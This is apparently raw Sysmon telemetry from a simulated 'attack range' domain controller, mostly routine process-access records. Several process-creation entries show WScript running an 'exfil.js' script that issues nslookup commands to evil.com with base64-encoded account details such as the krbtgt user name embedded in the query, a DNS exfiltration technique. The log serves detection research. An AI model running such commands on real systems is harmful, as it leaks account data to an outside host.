10341000x8000000000000000215727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6346-000000005F02}3460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-18E0-629A-6742-000000005F02}39764596C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6346-000000005F02}3460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.522{2E1864BB-18FF-629A-6346-000000005F02}3460C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfzpb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.505{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwhxbbtf.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.502{2E1864BB-18FF-629A-6146-000000005F02}59126396C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6246-000000005F02}988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6246-000000005F02}988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.483{2E1864BB-18FF-629A-6046-000000005F02}13846260C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-6246-000000005F02}988C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.495{2E1864BB-18FF-629A-6246-000000005F02}988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6046-000000005F02}1384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwhxbbtf.tmp 2>&1 10341000x8000000000000000215713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.468{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6146-000000005F02}5912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.468{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6146-000000005F02}5912C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.468{2E1864BB-18FF-629A-6146-000000005F02}59126396C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6046-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6146-000000005F02}5912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6046-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-18E0-629A-6742-000000005F02}39766980C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6046-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.456{2E1864BB-18FF-629A-6046-000000005F02}1384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwhxbbtf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.452{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllqzz.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-18FF-629A-5E46-000000005F02}53645272C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5F46-000000005F02}5944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.421{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4